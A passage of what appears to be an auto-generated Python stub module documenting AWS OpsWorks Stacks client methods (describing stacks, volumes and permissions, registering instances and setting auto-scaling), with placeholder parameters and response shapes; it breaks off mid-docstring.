'Encoding': 'ascii'|'big5'|'big5hkscs'|'cp037'|'cp424'|'cp437'|'cp500'|'cp720'|'cp737'|'cp775'|'cp850'|'cp852'|'cp855'|'cp856'|'cp857'|'cp858'|'cp860'|'cp861'|'cp862'|'cp863'|'cp864'|'cp865'|'cp866'|'cp869'|'cp874'|'cp875'|'cp932'|'cp949'|'cp950'|'cp1006'|'cp1026'|'cp1140'|'cp1250'|'cp1251'|'cp1252'|'cp1253'|'cp1254'|'cp1255'|'cp1256'|'cp1257'|'cp1258'|'euc_jp'|'euc_jis_2004'|'euc_jisx0213'|'euc_kr'|'gb2312'|'gbk'|'gb18030'|'hz'|'iso2022_jp'|'iso2022_jp_1'|'iso2022_jp_2'|'iso2022_jp_2004'|'iso2022_jp_3'|'iso2022_jp_ext'|'iso2022_kr'|'latin_1'|'iso8859_2'|'iso8859_3'|'iso8859_4'|'iso8859_5'|'iso8859_6'|'iso8859_7'|'iso8859_8'|'iso8859_9'|'iso8859_10'|'iso8859_13'|'iso8859_14'|'iso8859_15'|'iso8859_16'|'johab'|'koi8_r'|'koi8_u'|'mac_cyrillic'|'mac_greek'|'mac_iceland'|'mac_latin2'|'mac_roman'|'mac_turkish'|'ptcp154'|'shift_jis'|'shift_jis_2004'|'shift_jisx0213'|'utf_32'|'utf_32_be'|'utf_32_le'|'utf_16'|'utf_16_be'|'utf_16_le'|'utf_7'|'utf_8'|'utf_8_sig',
'BufferDuration': 123,
'BatchCount': 123,
'BatchSize': 123
},
]
},
'CustomInstanceProfileArn': 'string',
'CustomJson': 'string',
'CustomSecurityGroupIds': [
'string',
],
'DefaultSecurityGroupNames': [
'string',
],
'Packages': [
'string',
],
'VolumeConfigurations': [
{
'MountPoint': 'string',
'RaidLevel': 123,
'NumberOfDisks': 123,
'Size': 123,
'VolumeType': 'string',
'Iops': 123
},
],
'EnableAutoHealing': True|False,
'AutoAssignElasticIps': True|False,
'AutoAssignPublicIps': True|False,
'DefaultRecipes': {
'Setup': [
'string',
],
'Configure': [
'string',
],
'Deploy': [
'string',
],
'Undeploy': [
'string',
],
'Shutdown': [
'string',
]
},
'CustomRecipes': {
'Setup': [
'string',
],
'Configure': [
'string',
],
'Deploy': [
'string',
],
'Undeploy': [
'string',
],
'Shutdown': [
'string',
]
},
'CreatedAt': 'string',
'InstallUpdatesOnBoot': True|False,
'UseEbsOptimizedInstances': True|False,
'LifecycleEventConfiguration': {
'Shutdown': {
'ExecutionTimeout': 123,
'DelayUntilElbConnectionsDrained': True|False
}
}
},
]
}
:returns:
(string) --
(string) --
"""
pass
def describe_load_based_auto_scaling(LayerIds=None):
"""
Describes load-based auto scaling configurations for specified layers.
See also: AWS API Documentation
:example: response = client.describe_load_based_auto_scaling(
LayerIds=[
'string',
]
)
:type LayerIds: list
:param LayerIds: [REQUIRED]
An array of layer IDs.
(string) --
:rtype: dict
:return: {
'LoadBasedAutoScalingConfigurations': [
{
'LayerId': 'string',
'Enable': True|False,
'UpScaling': {
'InstanceCount': 123,
'ThresholdsWaitTime': 123,
'IgnoreMetricsTime': 123,
'CpuThreshold': 123.0,
'MemoryThreshold': 123.0,
'LoadThreshold': 123.0,
'Alarms': [
'string',
]
},
'DownScaling': {
'InstanceCount': 123,
'ThresholdsWaitTime': 123,
'IgnoreMetricsTime': 123,
'CpuThreshold': 123.0,
'MemoryThreshold': 123.0,
'LoadThreshold': 123.0,
'Alarms': [
'string',
]
}
},
]
}
:returns:
(string) --
"""
pass
def describe_my_user_profile():
"""
Describes a user's SSH information.
See also: AWS API Documentation
:example: response = client.describe_my_user_profile()
:rtype: dict
:return: {
'UserProfile': {
'IamUserArn': 'string',
'Name': 'string',
'SshUsername': 'string',
'SshPublicKey': 'string'
}
}
"""
pass
def describe_permissions(IamUserArn=None, StackId=None):
"""
Describes the permissions for a specified stack.
See also: AWS API Documentation
:example: response = client.describe_permissions(
IamUserArn='string',
StackId='string'
)
:type IamUserArn: string
:param IamUserArn: The user's IAM ARN. This can also be a federated user's ARN. For more information about IAM ARNs, see Using Identifiers.
:type StackId: string
:param StackId: The stack ID.
:rtype: dict
:return: {
'Permissions': [
{
'StackId': 'string',
'IamUserArn': 'string',
'AllowSsh': True|False,
'AllowSudo': True|False,
'Level': 'string'
},
]
}
:returns:
If the request object contains only a stack ID, the array contains a Permission object with permissions for each of the stack IAM ARNs.
If the request object contains only an IAM ARN, the array contains a Permission object with permissions for each of the user's stack IDs.
If the request contains a stack ID and an IAM ARN, the array contains a single Permission object with permissions for the specified stack and IAM ARN.
"""
pass
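The Permissions array above pairs each IAM ARN with a permission Level. A sketch of a hypothetical helper that indexes it (the sample response and level value are illustrative):

```python
def permission_levels(response):
    """Index a DescribePermissions-shaped response by IAM ARN -> Level."""
    return {p['IamUserArn']: p['Level'] for p in response.get('Permissions', [])}

# Illustrative response in the documented shape.
sample = {'Permissions': [
    {'StackId': 's-1', 'IamUserArn': 'arn:aws:iam::123456789012:user/alice',
     'AllowSsh': True, 'AllowSudo': False, 'Level': 'manage'},
]}
print(permission_levels(sample))  # {'arn:aws:iam::123456789012:user/alice': 'manage'}
```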
def describe_raid_arrays(InstanceId=None, StackId=None, RaidArrayIds=None):
"""
Describes an instance's RAID arrays.
See also: AWS API Documentation
:example: response = client.describe_raid_arrays(
InstanceId='string',
StackId='string',
RaidArrayIds=[
'string',
]
)
:type InstanceId: string
:param InstanceId: The instance ID. If you use this parameter, DescribeRaidArrays returns descriptions of the RAID arrays associated with the specified instance.
:type StackId: string
:param StackId: The stack ID.
:type RaidArrayIds: list
:param RaidArrayIds: An array of RAID array IDs. If you use this parameter, DescribeRaidArrays returns descriptions of the specified arrays. Otherwise, it returns a description of every array.
(string) --
:rtype: dict
:return: {
'RaidArrays': [
{
'RaidArrayId': 'string',
'InstanceId': 'string',
'Name': 'string',
'RaidLevel': 123,
'NumberOfDisks': 123,
'Size': 123,
'Device': 'string',
'MountPoint': 'string',
'AvailabilityZone': 'string',
'CreatedAt': 'string',
'StackId': 'string',
'VolumeType': 'string',
'Iops': 123
},
]
}
"""
pass
def describe_rds_db_instances(StackId=None, RdsDbInstanceArns=None):
"""
Describes Amazon RDS instances.
This call accepts only one resource-identifying parameter.
See also: AWS API Documentation
:example: response = client.describe_rds_db_instances(
StackId='string',
RdsDbInstanceArns=[
'string',
]
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID that the instances are registered with. The operation returns descriptions of all registered Amazon RDS instances.
:type RdsDbInstanceArns: list
:param RdsDbInstanceArns: An array containing the ARNs of the instances to be described.
(string) --
:rtype: dict
:return: {
'RdsDbInstances': [
{
'RdsDbInstanceArn': 'string',
'DbInstanceIdentifier': 'string',
'DbUser': 'string',
'DbPassword': 'string',
'Region': 'string',
'Address': 'string',
'Engine': 'string',
'StackId': 'string',
'MissingOnRds': True|False
},
]
}
"""
pass
def describe_service_errors(StackId=None, InstanceId=None, ServiceErrorIds=None):
"""
Describes AWS OpsWorks Stacks service errors.
This call accepts only one resource-identifying parameter.
See also: AWS API Documentation
:example: response = client.describe_service_errors(
StackId='string',
InstanceId='string',
ServiceErrorIds=[
'string',
]
)
:type StackId: string
:param StackId: The stack ID. If you use this parameter, DescribeServiceErrors returns descriptions of the errors associated with the specified stack.
:type InstanceId: string
:param InstanceId: The instance ID. If you use this parameter, DescribeServiceErrors returns descriptions of the errors associated with the specified instance.
:type ServiceErrorIds: list
:param ServiceErrorIds: An array of service error IDs. If you use this parameter, DescribeServiceErrors returns descriptions of the specified errors. Otherwise, it returns a description of every error.
(string) --
:rtype: dict
:return: {
'ServiceErrors': [
{
'ServiceErrorId': 'string',
'StackId': 'string',
'InstanceId': 'string',
'Type': 'string',
'Message': 'string',
'CreatedAt': 'string'
},
]
}
"""
pass
def describe_stack_provisioning_parameters(StackId=None):
"""
Requests a description of a stack's provisioning parameters.
See also: AWS API Documentation
:example: response = client.describe_stack_provisioning_parameters(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:rtype: dict
:return: {
'AgentInstallerUrl': 'string',
'Parameters': {
'string': 'string'
}
}
"""
pass
def describe_stack_summary(StackId=None):
"""
Describes the number of layers and apps in a specified stack, and the number of instances in each state, such as running_setup or online .
See also: AWS API Documentation
:example: response = client.describe_stack_summary(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:rtype: dict
:return: {
'StackSummary': {
'StackId': 'string',
'Name': 'string',
'Arn': 'string',
'LayersCount': 123,
'AppsCount': 123,
'InstancesCount': {
'Assigning': 123,
'Booting': 123,
'ConnectionLost': 123,
'Deregistering': 123,
'Online': 123,
'Pending': 123,
'Rebooting': 123,
'Registered': 123,
'Registering': 123,
'Requested': 123,
'RunningSetup': 123,
'SetupFailed': 123,
'ShuttingDown': 123,
'StartFailed': 123,
'Stopped': 123,
'Stopping': 123,
'Terminated': 123,
'Terminating': 123,
'Unassigning': 123
}
}
}
"""
pass
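The InstancesCount map above holds one counter per instance state. A sketch of a hypothetical helper that totals them (the sample summary is illustrative):

```python
def total_instances(summary):
    """Sum every state counter in a StackSummary-shaped InstancesCount map."""
    return sum(v for v in summary.get('InstancesCount', {}).values() if isinstance(v, int))

# Illustrative StackSummary fragment in the documented shape.
sample = {'InstancesCount': {'Online': 3, 'Stopped': 1, 'SetupFailed': 0}}
print(total_instances(sample))  # 4
```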
def describe_stacks(StackIds=None):
"""
Requests a description of one or more stacks.
See also: AWS API Documentation
:example: response = client.describe_stacks(
StackIds=[
'string',
]
)
:type StackIds: list
:param StackIds: An array of stack IDs that specify the stacks to be described. If you omit this parameter, DescribeStacks returns a description of every stack.
(string) --
:rtype: dict
:return: {
'Stacks': [
{
'StackId': 'string',
'Name': 'string',
'Arn': 'string',
'Region': 'string',
'VpcId': 'string',
'Attributes': {
'string': 'string'
},
'ServiceRoleArn': 'string',
'DefaultInstanceProfileArn': 'string',
'DefaultOs': 'string',
'HostnameTheme': 'string',
'DefaultAvailabilityZone': 'string',
'DefaultSubnetId': 'string',
'CustomJson': 'string',
'ConfigurationManager': {
'Name': 'string',
'Version': 'string'
},
'ChefConfiguration': {
'ManageBerkshelf': True|False,
'BerkshelfVersion': 'string'
},
'UseCustomCookbooks': True|False,
'UseOpsworksSecurityGroups': True|False,
'CustomCookbooksSource': {
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
'DefaultSshKeyName': 'string',
'CreatedAt': 'string',
'DefaultRootDeviceType': 'ebs'|'instance-store',
'AgentVersion': 'string'
},
]
}
:returns:
(string) --
(string) --
"""
pass
def describe_time_based_auto_scaling(InstanceIds=None):
"""
Describes time-based auto scaling configurations for specified instances.
See also: AWS API Documentation
:example: response = client.describe_time_based_auto_scaling(
InstanceIds=[
'string',
]
)
:type InstanceIds: list
:param InstanceIds: [REQUIRED]
An array of instance IDs.
(string) --
:rtype: dict
:return: {
'TimeBasedAutoScalingConfigurations': [
{
'InstanceId': 'string',
'AutoScalingSchedule': {
'Monday': {
'string': 'string'
},
'Tuesday': {
'string': 'string'
},
'Wednesday': {
'string': 'string'
},
'Thursday': {
'string': 'string'
},
'Friday': {
'string': 'string'
},
'Saturday': {
'string': 'string'
},
'Sunday': {
'string': 'string'
}
}
},
]
}
:returns:
(string) --
(string) --
"""
pass
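The AutoScalingSchedule above keys each day by hour strings ('0' through '23'); an hour that is present with the value 'on' (the convention assumed here) means the instance runs during that hour. A sketch of a hypothetical lookup helper, with an illustrative schedule:

```python
def scheduled_on(schedule, day, hour):
    """True if an AutoScalingSchedule-shaped map keeps the instance on at day/hour."""
    return schedule.get(day, {}).get(str(hour)) == 'on'

# Illustrative schedule in the documented shape.
sample_schedule = {'Monday': {'9': 'on', '10': 'on'}, 'Sunday': {}}
print(scheduled_on(sample_schedule, 'Monday', 9))   # True
print(scheduled_on(sample_schedule, 'Sunday', 9))   # False
```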
def describe_user_profiles(IamUserArns=None):
"""
Describe specified users.
See also: AWS API Documentation
:example: response = client.describe_user_profiles(
IamUserArns=[
'string',
]
)
:type IamUserArns: list
:param IamUserArns: An array of IAM or federated user ARNs that identify the users to be described.
(string) --
:rtype: dict
:return: {
'UserProfiles': [
{
'IamUserArn': 'string',
'Name': 'string',
'SshUsername': 'string',
'SshPublicKey': 'string',
'AllowSelfManagement': True|False
},
]
}
"""
pass
def describe_volumes(InstanceId=None, StackId=None, RaidArrayId=None, VolumeIds=None):
"""
Describes an instance's Amazon EBS volumes.
See also: AWS API Documentation
:example: response = client.describe_volumes(
InstanceId='string',
StackId='string',
RaidArrayId='string',
VolumeIds=[
'string',
]
)
:type InstanceId: string
:param InstanceId: The instance ID. If you use this parameter, DescribeVolumes returns descriptions of the volumes associated with the specified instance.
:type StackId: string
:param StackId: A stack ID. The action describes the stack's registered Amazon EBS volumes.
:type RaidArrayId: string
:param RaidArrayId: The RAID array ID. If you use this parameter, DescribeVolumes returns descriptions of the volumes associated with the specified RAID array.
:type VolumeIds: list
:param VolumeIds: An array of volume IDs. If you use this parameter, DescribeVolumes returns descriptions of the specified volumes. Otherwise, it returns a description of every volume.
(string) --
:rtype: dict
:return: {
'Volumes': [
{
'VolumeId': 'string',
'Ec2VolumeId': 'string',
'Name': 'string',
'RaidArrayId': 'string',
'InstanceId': 'string',
'Status': 'string',
'Size': 123,
'Device': 'string',
'MountPoint': 'string',
'Region': 'string',
'AvailabilityZone': 'string',
'VolumeType': 'string',
'Iops': 123
},
]
}
"""
pass
def detach_elastic_load_balancer(ElasticLoadBalancerName=None, LayerId=None):
"""
Detaches a specified Elastic Load Balancing instance from its layer.
See also: AWS API Documentation
:example: response = client.detach_elastic_load_balancer(
ElasticLoadBalancerName='string',
LayerId='string'
)
:type ElasticLoadBalancerName: string
:param ElasticLoadBalancerName: [REQUIRED]
The Elastic Load Balancing instance's name.
:type LayerId: string
:param LayerId: [REQUIRED]
The ID of the layer that the Elastic Load Balancing instance is attached to.
"""
pass
def disassociate_elastic_ip(ElasticIp=None):
"""
Disassociates an Elastic IP address from its instance. The address remains registered with the stack. For more information, see Resource Management.
See also: AWS API Documentation
:example: response = client.disassociate_elastic_ip(
ElasticIp='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The Elastic IP address.
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_hostname_suggestion(LayerId=None):
"""
Gets a generated host name for the specified layer, based on the current host name theme.
See also: AWS API Documentation
:example: response = client.get_hostname_suggestion(
LayerId='string'
)
:type LayerId: string
:param LayerId: [REQUIRED]
The layer ID.
:rtype: dict
:return: {
'LayerId': 'string',
'Hostname': 'string'
}
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_waiter():
"""
"""
pass
def grant_access(InstanceId=None, ValidForInMinutes=None):
"""
Grants RDP access to a Windows instance for a specified time period.
See also: AWS API Documentation
:example: response = client.grant_access(
InstanceId='string',
ValidForInMinutes=123
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance's AWS OpsWorks Stacks ID.
:type ValidForInMinutes: integer
:param ValidForInMinutes: The length of time (in minutes) that the grant is valid. When the grant expires at the end of this period, the user will no longer be able to use the credentials to log in. If the user is logged in at the time, they are logged out automatically.
:rtype: dict
:return: {
'TemporaryCredential': {
'Username': 'string',
'Password': 'string',
'ValidForInMinutes': 123,
'InstanceId': 'string'
}
}
"""
pass
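ValidForInMinutes above bounds how long a TemporaryCredential works. A sketch of a hypothetical helper that computes the expiry time from an issue timestamp (the timestamps below are illustrative):

```python
from datetime import datetime, timedelta

def credential_expiry(issued_at, valid_for_in_minutes):
    """When a TemporaryCredential issued at issued_at stops working."""
    return issued_at + timedelta(minutes=valid_for_in_minutes)

issued = datetime(2017, 1, 1, 12, 0)
print(credential_expiry(issued, 90))  # 2017-01-01 13:30:00
```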
def reboot_instance(InstanceId=None):
"""
Reboots a specified instance. For more information, see Starting, Stopping, and Rebooting Instances.
See also: AWS API Documentation
:example: response = client.reboot_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def register_ecs_cluster(EcsClusterArn=None, StackId=None):
"""
Registers a specified Amazon ECS cluster with a stack. You can register only one cluster with a stack. A cluster can be registered with only one stack. For more information, see Resource Management.
See also: AWS API Documentation
:example: response = client.register_ecs_cluster(
EcsClusterArn='string',
StackId='string'
)
:type EcsClusterArn: string
:param EcsClusterArn: [REQUIRED]
The cluster's ARN.
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:rtype: dict
:return: {
'EcsClusterArn': 'string'
}
"""
pass
def register_elastic_ip(ElasticIp=None, StackId=None):
"""
Registers an Elastic IP address with a specified stack. An address can be registered with only one stack at a time. If the address is already registered, you must first deregister it by calling DeregisterElasticIp. For more information, see Resource Management.
See also: AWS API Documentation
:example: response = client.register_elastic_ip(
ElasticIp='string',
StackId='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The Elastic IP address.
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:rtype: dict
:return: {
'ElasticIp': 'string'
}
"""
pass
def register_instance(StackId=None, Hostname=None, PublicIp=None, PrivateIp=None, RsaPublicKey=None, RsaPublicKeyFingerprint=None, InstanceIdentity=None):
"""
Registers instances that were created outside of AWS OpsWorks Stacks with a specified stack.
Registered instances have the same requirements as instances that are created by using the CreateInstance API. For example, registered instances must be running a supported Linux-based operating system, and they must have a supported instance type. For more information about requirements for instances that you want to register, see Preparing the Instance.
See also: AWS API Documentation
:example: response = client.register_instance(
StackId='string',
Hostname='string',
PublicIp='string',
PrivateIp='string',
RsaPublicKey='string',
RsaPublicKeyFingerprint='string',
InstanceIdentity={
'Document': 'string',
'Signature': 'string'
}
)
:type StackId: string
:param StackId: [REQUIRED]
The ID of the stack that the instance is to be registered with.
:type Hostname: string
:param Hostname: The instance's hostname.
:type PublicIp: string
:param PublicIp: The instance's public IP address.
:type PrivateIp: string
:param PrivateIp: The instance's private IP address.
:type RsaPublicKey: string
:param RsaPublicKey: The instance's public RSA key. This key is used to encrypt communication between the instance and the service.
:type RsaPublicKeyFingerprint: string
:param RsaPublicKeyFingerprint: The instance's public RSA key fingerprint.
:type InstanceIdentity: dict
:param InstanceIdentity: An InstanceIdentity object that contains the instance's identity.
Document (string) --A JSON document that contains the metadata.
Signature (string) --A signature that can be used to verify the document's accuracy and authenticity.
:rtype: dict
:return: {
'InstanceId': 'string'
}
"""
pass
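The InstanceIdentity document and signature above come from the EC2 instance identity metadata on the instance being registered. A minimal sketch of assembling the request arguments, assuming the identity document and signature have already been fetched (the stack ID and hostname below are placeholders):

```python
# Sketch: assemble keyword arguments for client.register_instance().
# 'stack-id', the document, and the signature are placeholders; on a
# real instance the document and signature come from the EC2
# instance-identity metadata endpoints.
def build_register_instance_params(stack_id, document, signature,
                                   hostname=None):
    """Build the kwargs dict for register_instance."""
    params = {
        'StackId': stack_id,
        'InstanceIdentity': {
            'Document': document,    # JSON identity document
            'Signature': signature,  # signature used to verify the document
        },
    }
    if hostname:
        params['Hostname'] = hostname
    return params

params = build_register_instance_params('stack-id', '{...}', 'sig==',
                                        hostname='web1')
# response = client.register_instance(**params)
```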
def register_rds_db_instance(StackId=None, RdsDbInstanceArn=None, DbUser=None, DbPassword=None):
"""
Registers an Amazon RDS instance with a stack.
See also: AWS API Documentation
:example: response = client.register_rds_db_instance(
StackId='string',
RdsDbInstanceArn='string',
DbUser='string',
DbPassword='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type RdsDbInstanceArn: string
:param RdsDbInstanceArn: [REQUIRED]
The Amazon RDS instance's ARN.
:type DbUser: string
:param DbUser: [REQUIRED]
The database's master user name.
:type DbPassword: string
:param DbPassword: [REQUIRED]
The database password.
"""
pass
def register_volume(Ec2VolumeId=None, StackId=None):
"""
Registers an Amazon EBS volume with a specified stack. A volume can be registered with only one stack at a time. If the volume is already registered, you must first deregister it by calling DeregisterVolume . For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.register_volume(
Ec2VolumeId='string',
StackId='string'
)
:type Ec2VolumeId: string
:param Ec2VolumeId: The Amazon EBS volume ID.
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:rtype: dict
:return: {
'VolumeId': 'string'
}
"""
pass
def set_load_based_auto_scaling(LayerId=None, Enable=None, UpScaling=None, DownScaling=None):
"""
Specify the load-based auto scaling configuration for a specified layer. For more information, see Managing Load with Time-based and Load-based Instances .
See also: AWS API Documentation
:example: response = client.set_load_based_auto_scaling(
LayerId='string',
Enable=True|False,
UpScaling={
'InstanceCount': 123,
'ThresholdsWaitTime': 123,
'IgnoreMetricsTime': 123,
'CpuThreshold': 123.0,
'MemoryThreshold': 123.0,
'LoadThreshold': 123.0,
'Alarms': [
'string',
]
},
DownScaling={
'InstanceCount': 123,
'ThresholdsWaitTime': 123,
'IgnoreMetricsTime': 123,
'CpuThreshold': 123.0,
'MemoryThreshold': 123.0,
'LoadThreshold': 123.0,
'Alarms': [
'string',
]
}
)
:type LayerId: string
:param LayerId: [REQUIRED]
The layer ID.
:type Enable: boolean
:param Enable: Enables load-based auto scaling for the layer.
:type UpScaling: dict
:param UpScaling: An AutoScalingThresholds object with the upscaling threshold configuration. If the load exceeds these thresholds for a specified amount of time, AWS OpsWorks Stacks starts a specified number of instances.
InstanceCount (integer) --The number of instances to add or remove when the load exceeds a threshold.
ThresholdsWaitTime (integer) --The amount of time, in minutes, that the load must exceed a threshold before more instances are added or removed.
IgnoreMetricsTime (integer) --The amount of time (in minutes) after a scaling event occurs that AWS OpsWorks Stacks should ignore metrics and suppress additional scaling events. For example, AWS OpsWorks Stacks adds new instances following an upscaling event but the instances won't start reducing the load until they have been booted and configured. There is no point in raising additional scaling events during that operation, which typically takes several minutes. IgnoreMetricsTime allows you to direct AWS OpsWorks Stacks to suppress scaling events long enough to get the new instances online.
CpuThreshold (float) --The CPU utilization threshold, as a percent of the available CPU. A value of -1 disables the threshold.
MemoryThreshold (float) --The memory utilization threshold, as a percent of the available memory. A value of -1 disables the threshold.
LoadThreshold (float) --The load threshold. A value of -1 disables the threshold. For more information about how load is computed, see Load (computing) .
Alarms (list) --Custom CloudWatch auto scaling alarms, to be used as thresholds. This parameter takes a list of up to five alarm names, which are case sensitive and must be in the same region as the stack.
Note
To use custom alarms, you must update your service role to allow cloudwatch:DescribeAlarms . You can either have AWS OpsWorks Stacks update the role for you when you first use this feature or you can edit the role manually. For more information, see Allowing AWS OpsWorks Stacks to Act on Your Behalf .
(string) --
:type DownScaling: dict
:param DownScaling: An AutoScalingThresholds object with the downscaling threshold configuration. If the load falls below these thresholds for a specified amount of time, AWS OpsWorks Stacks stops a specified number of instances.
InstanceCount (integer) --The number of instances to add or remove when the load exceeds a threshold.
ThresholdsWaitTime (integer) --The amount of time, in minutes, that the load must exceed a threshold before more instances are added or removed.
IgnoreMetricsTime (integer) --The amount of time (in minutes) after a scaling event occurs that AWS OpsWorks Stacks should ignore metrics and suppress additional scaling events. For example, AWS OpsWorks Stacks adds new instances following an upscaling event but the instances won't start reducing the load until they have been booted and configured. There is no point in raising additional scaling events during that operation, which typically takes several minutes. IgnoreMetricsTime allows you to direct AWS OpsWorks Stacks to suppress scaling events long enough to get the new instances online.
CpuThreshold (float) --The CPU utilization threshold, as a percent of the available CPU. A value of -1 disables the threshold.
MemoryThreshold (float) --The memory utilization threshold, as a percent of the available memory. A value of -1 disables the threshold.
LoadThreshold (float) --The load threshold. A value of -1 disables the threshold. For more information about how load is computed, see Load (computing) .
Alarms (list) --Custom CloudWatch auto scaling alarms, to be used as thresholds. This parameter takes a list of up to five alarm names, which are case sensitive and must be in the same region as the stack.
Note
To use custom alarms, you must update your service role to allow cloudwatch:DescribeAlarms . You can either have AWS OpsWorks Stacks update the role for you when you first use this feature or you can edit the role manually. For more information, see Allowing AWS OpsWorks Stacks to Act on Your Behalf .
(string) --
"""
pass
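The UpScaling and DownScaling arguments above share the same AutoScalingThresholds shape, where -1 disables a metric threshold and at most five alarm names are allowed. A sketch of a small helper that builds these dicts (the layer ID and the 80%/30% CPU thresholds are illustrative assumptions):

```python
# Sketch: build an AutoScalingThresholds dict for
# set_load_based_auto_scaling. A threshold of -1 disables that metric;
# the Alarms list is capped at five names, as the API requires.
def thresholds(instance_count, cpu=-1.0, memory=-1.0, load=-1.0,
               wait_minutes=5, ignore_minutes=10, alarms=None):
    alarms = alarms or []
    if len(alarms) > 5:
        raise ValueError('at most five CloudWatch alarm names are allowed')
    return {
        'InstanceCount': instance_count,
        'ThresholdsWaitTime': wait_minutes,
        'IgnoreMetricsTime': ignore_minutes,
        'CpuThreshold': cpu,
        'MemoryThreshold': memory,
        'LoadThreshold': load,
        'Alarms': alarms,
    }

up = thresholds(2, cpu=80.0)     # add 2 instances when CPU exceeds 80%
down = thresholds(1, cpu=30.0)   # remove 1 instance when CPU drops below 30%
# response = client.set_load_based_auto_scaling(
#     LayerId='layer-id', Enable=True, UpScaling=up, DownScaling=down)
```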
def set_permission(StackId=None, IamUserArn=None, AllowSsh=None, AllowSudo=None, Level=None):
"""
Specifies a user's permissions. For more information, see Security and Permissions .
See also: AWS API Documentation
:example: response = client.set_permission(
StackId='string',
IamUserArn='string',
AllowSsh=True|False,
AllowSudo=True|False,
Level='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type IamUserArn: string
:param IamUserArn: [REQUIRED]
The user's IAM ARN. This can also be a federated user's ARN.
:type AllowSsh: boolean
:param AllowSsh: The user is allowed to use SSH to communicate with the instance.
:type AllowSudo: boolean
:param AllowSudo: The user is allowed to use sudo to elevate privileges.
:type Level: string
:param Level: The user's permission level, which must be set to one of the following strings. You cannot set your own permissions level.
deny
show
deploy
manage
iam_only
For more information on the permissions associated with these levels, see Managing User Permissions .
"""
pass
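Since Level must be one of the five strings listed above, it can be cheap to validate client-side before the call. A sketch (the stack ID and user ARN are placeholders):

```python
# Sketch: validate the Level value before calling set_permission;
# these five strings are the permission levels the API accepts.
VALID_LEVELS = {'deny', 'show', 'deploy', 'manage', 'iam_only'}

def permission_params(stack_id, iam_user_arn, level,
                      allow_ssh=False, allow_sudo=False):
    if level not in VALID_LEVELS:
        raise ValueError('level must be one of %s' % sorted(VALID_LEVELS))
    return {
        'StackId': stack_id,
        'IamUserArn': iam_user_arn,
        'AllowSsh': allow_ssh,
        'AllowSudo': allow_sudo,
        'Level': level,
    }

params = permission_params('stack-id',
                           'arn:aws:iam::123456789012:user/dev',
                           'deploy', allow_ssh=True)
# client.set_permission(**params)
```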
def set_time_based_auto_scaling(InstanceId=None, AutoScalingSchedule=None):
"""
Specify the time-based auto scaling configuration for a specified instance. For more information, see Managing Load with Time-based and Load-based Instances .
See also: AWS API Documentation
:example: response = client.set_time_based_auto_scaling(
InstanceId='string',
AutoScalingSchedule={
'Monday': {
'string': 'string'
},
'Tuesday': {
'string': 'string'
},
'Wednesday': {
'string': 'string'
},
'Thursday': {
'string': 'string'
},
'Friday': {
'string': 'string'
},
'Saturday': {
'string': 'string'
},
'Sunday': {
'string': 'string'
}
}
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
:type AutoScalingSchedule: dict
:param AutoScalingSchedule: An AutoScalingSchedule with the instance schedule.
Monday (dict) --The schedule for Monday.
(string) --
(string) --
Tuesday (dict) --The schedule for Tuesday.
(string) --
(string) --
Wednesday (dict) --The schedule for Wednesday.
(string) --
(string) --
Thursday (dict) --The schedule for Thursday.
(string) --
(string) --
Friday (dict) --The schedule for Friday.
(string) --
(string) --
Saturday (dict) --The schedule for Saturday.
(string) --
(string) --
Sunday (dict) --The schedule for Sunday.
(string) --
(string) --
"""
pass
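Each day's schedule in the AutoScalingSchedule maps hour strings ('0' through '23') to 'on' for the hours the instance should run; omitted hours leave it off. A sketch that builds a weekday business-hours schedule (the 9:00-17:00 window is an illustrative assumption):

```python
# Sketch: build a weekly AutoScalingSchedule for
# set_time_based_auto_scaling. Hours are string keys '0'-'23';
# an hour mapped to 'on' keeps the instance running during it.
def daily_hours(start, end):
    """Hours [start, end) as the {'hour': 'on'} map the API expects."""
    return {str(h): 'on' for h in range(start, end)}

schedule = {day: daily_hours(9, 17)
            for day in ('Monday', 'Tuesday', 'Wednesday',
                        'Thursday', 'Friday')}
# client.set_time_based_auto_scaling(
#     InstanceId='instance-id', AutoScalingSchedule=schedule)
```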
def start_instance(InstanceId=None):
"""
Starts a specified instance. For more information, see Starting, Stopping, and Rebooting Instances .
See also: AWS API Documentation
:example: response = client.start_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def start_stack(StackId=None):
"""
Starts a stack's instances.
See also: AWS API Documentation
:example: response = client.start_stack(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
"""
pass
def stop_instance(InstanceId=None):
"""
Stops a specified instance. When you stop a standard instance, the data disappears and must be reinstalled when you restart the instance. You can stop an Amazon EBS-backed instance without losing data. For more information, see Starting, Stopping, and Rebooting Instances .
See also: AWS API Documentation
